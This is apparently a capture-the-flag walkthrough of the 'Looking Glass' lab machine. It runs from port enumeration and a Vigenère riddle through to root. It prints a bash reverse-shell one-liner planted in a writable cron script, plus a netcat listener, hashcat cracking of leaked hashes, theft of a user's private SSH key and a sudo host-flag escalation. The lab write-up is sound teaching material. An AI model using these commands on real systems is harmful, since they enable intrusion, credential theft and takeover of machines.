Looking Glass
Basic Enumeration
nmap -vv -p- -oN nmap/ports $IP
This returns a lot. Port 22 is open, and a lot of other ports.
Lets scan them all:
nmap -p- -vv -sV -oN nmap/all $IP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9000/tcp open ssh syn-ack Dropbear sshd (protocol 2.0)
........
13999/tcp open ssh syn-ack Dropbear sshd (protocol 2.0)
Check for other protocols with exclusive grep:
cat nmap/all | grep -i -v ssh
Returns:
ORT STATE SERVICE REASON VERSION
9100/tcp open jetdirect? syn-ack ttl 63
9101/tcp open jetdirect? syn-ack ttl 63
9102/tcp open jetdirect? syn-ack ttl 63
9103/tcp open jetdirect? syn-ack ttl 63
9104/tcp open jetdirect? syn-ack ttl 63
9105/tcp open jetdirect? syn-ack ttl 63
9106/tcp open jetdirect? syn-ack ttl 63
9107/tcp open jetdirect? syn-ack ttl 63
Delving deeper into the enumeration results (and enumerating further)
Checking my favorite resource for pentesting/ctfs for infos on jetdirect:
Well it seems like this is Dropbear sshd too, if trying to grab the banner we get:
nc -vn $IP 9100
(UNKNOWN) [10.10.235.132] 9100 (?) open
SSH-2.0-dropbear
BUT!
Ports 9101,9102,9103 return something different:
(UNKNOWN) [10.10.235.132] 9101 (bacula-dir) open
(UNKNOWN) [10.10.235.132] 9102 (bacula-fd) open
(UNKNOWN) [10.10.235.132] 9103 (bacula-sd open
We'll skip this bacula stuff for now, and come back to it if needed.
Trying to connect to the Dropbear ssh ports with any random user returns "Lower" or "Higher", but reversed. On 9000 we get lower and on 13999 we get higher. I made a script that can run and play this game for us.
#!/bin/bash
user="alice"
host=""
#ports may differ for you
min=9000
max=13999
while true; do
port=$(($min + (($max - $min) / 2)))
response=$(ssh -o StrictHostKeyChecking=no -o PasswordAuthentication=no -o BatchMode=yes -o ConnectTimeout=5 $user@$host -p $port 2>&1)
echo "Port: $port Response: $response"
if [[ $response == *"Lower"* ]]; then
min=$port
elif [[ $response == *"Higher"* ]]; then
max=$port
else
echo "Correct port found: $port"
exit 0
fi
done
echo "Failed to find the correct port within the specified range."
exit 1
The script is not perfect, so once it hangs for a few seconds, we have to manually exit it.
Port: 9611 Response: You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'
Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.
Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!
Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.
'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.
'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Enter Secret: Incorrect secret.
Connection to 10.10.235.132 closed.
Correct port found: 9611
Decrypting the "ssh riddle"
We can use the following to detect what cipher it is:
After trying around with the same site and cyberchef I just searched for vigenere cracker and found this page:
Here we can crack the cipher in less than a second. I do not know if thats because the text was already decrypted earlier on this page or if the key is just well known...anyways, the secret is at the bottom of the deciphered text.
We ssh into the same port that the challenge was at and enter the secret, which will return user:password. Those credentials can be used to ssh into the box via port 22.
Exploring the machine with the first user
Bash history lives in the abyss (/dev/null)
This is interesting:
sudo -l
Matching Defaults entries for jabberwock on looking-glass:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
Capabilities not so interesting:
getcap -r / 2>/dev/null
usr/bin/mtr-packet = cap_net_raw+ep
Permissions interesting again!
ls -al /home
drwx--x--x 6 alice alice 4096 Jul 3 2020 alice
drwx------ 2 humptydumpty humptydumpty 4096 Jul 3 2020 humptydumpty
drwxrwxrwx 5 jabberwock jabberwock 4096 Nov 4 13:07 jabberwock
drwx------ 5 tryhackme tryhackme 4096 Jul 3 2020 tryhackme
drwx------ 3 tweedledee tweedledee 4096 Jul 3 2020 tweedledee
drwx------ 2 tweedledum tweedledum 4096 Jul 3 2020 tweedledum
cat /home/alice/.ssh/id_rsa
cat: /home/alice/.ssh/id_rsa: Permission denied
cat /home/alice/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY+dwBeKw2NtTbGLN+3hpg+qZ9ebXvfkU+UZ/iP0TFmGWaYM0hFyE9oVSoldBmLmvJAfpjFk/kgglcQ0r5rhahEPI+jIYr/retdOf8hZYpCRr21DbGt2fLF3Bu2Io/Uvhur/i9Tc5RwD5pgfGqHKrf1qul5x4dWK36NU+uIeIIDveTuAcKCmTBZzM1rkwwaj7UKDiJ/N9+/i6E+TEEsuXd/isF/zhGa4oQTLpthn79Y4SAeV+SzmeAWeJbvHZHe/KrvHIOvCJcSN9bjJh76QuIZnLKTWJrscaE0qkhG5890l1P6s0auNgUuOHN5ZgGYfHsmSGQRQUhXHplXXL6CKF alice@looking-glass
That looks promising, maybe we can use it afterwards! There is a private key!
ls -al ~
-rw-rw-r-- 1 jabberwock jabberwock 935 Jun 30 2020 poem.txt
-rwxrwxr-x 1 jabberwock jabberwock 85 Nov 4 14:05 twasBrillig.sh
-rw-r--r-- 1 jabberwock jabberwock 38 Jul 3 2020 user.txt
Yay, the user flag.
cat user.txt
Use cyberchef or python to reverse the flag!
Linpeas
CRON:
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
Sudoers:
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
Sudoers file: /etc/sudoers.d/alice is readable
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
Since we have write permissions for the "twasBrilling.sh", we will just opt for a quick reverse shell and pop it by rebooting:
/bin/bash -i >& /dev/tcp/<yourip>/<yourport> 0>&1
Setting up the listener:
nc -lnvp <yourport>
Rebooting and waiting:
sudo reboot now
I noticed that the password for the jabberwock user, aswell as the ssh riddle port changed. The secret stays the same though. So just find the port and enter the secret
Exploring the machine with the second user
First we will upgrade our reverse shell. (for detailed explanation check out this site)
python3 -c 'import pty;pty.spawn("/bin/bash")'
# press ctrl+z
stty raw -echo; fg
export TERM=xterm
Enumerate manually
Remember the private key in alice's ~ ...well same here, no permission
ls -al
-rw-r--r-- 1 root root 520 Jul 3 2020 humptydumpty.txt
-rw-r--r-- 1 root root 296 Jul 3 2020 poem.txt
sudo -l
Matching Defaults entries for tweedledum on looking-glass:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tweedledum may run the following commands on looking-glass:
(tweedledee) NOPASSWD: /bin/bash
cat humptydumpty.txt
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9:maybe
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed:one
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624:of
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f:these
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6:is
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0:the
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8:password
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
cat poem.txt
'Tweedledum and Tweedledee
Agreed to have a battle;
For Tweedledum said Tweedledee
Had spoiled his nice new rattle.
Just then flew down a monstrous crow,
As black as a tar-barrel;
Which frightened both the heroes so,
They quite forgot their quarrel.'
We can switch to user tweedledee, but as in the book, those users here are twins.
The poem does not help too...
So well just take the output from "humptydumpty.txt" and throw it into hashcat.
The hashes look like SHA-256
hashcat humptydumpty.txt /path/to/your/favorite/wordlist -m 1400
Right of the bat, we can crack 4 hashes, form there we can guess the two words missing to create a sentence, which leaves us with one hash.
Looking closely at the hash, there is something off with the structure.(at least for me. I got stuck here for a while)
It looks more like hex encoding than a hash.
Cyberchef -> From Hex does the trick...a new password!
The password can not be used with ssh but just to switch the user:
su humptydumpty
Exploring the machine with the third user
Here we can finally do what we have been waiting for!
cat /home/alice/.ssh/id_rsa
We create our own key. Just pasting the key data and saving
vi id_rsa
Change the permissions, otherwise it will not work
chmod 600 id_rsa
SSH as alice
ssh -i id_rsa alice@$IP
Exploring the machine with the fourth user
Nothing interesting here...another txt file with a story.
But we found something earlier with the first user:
Sudoers file: /etc/sudoers.d/alice is readable
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
alice can run /bin/bash as root on ssalg-gnikool, which conveniently is our hostname, but backwards...well...
This does not work, because our hostname is "looking-glass", which can not be changed without sudo.
sudo /bin/bash
After researching how to change or spoof the username without success, I just used the man pages for the sudo command so see if there is something...
And there is literally a flag to set the host...
sudo -h ssalg-gnikool /bin/bash
Even if this throws an error, it escalates to root!
cat the root.txt and reverse it like the user.txt before!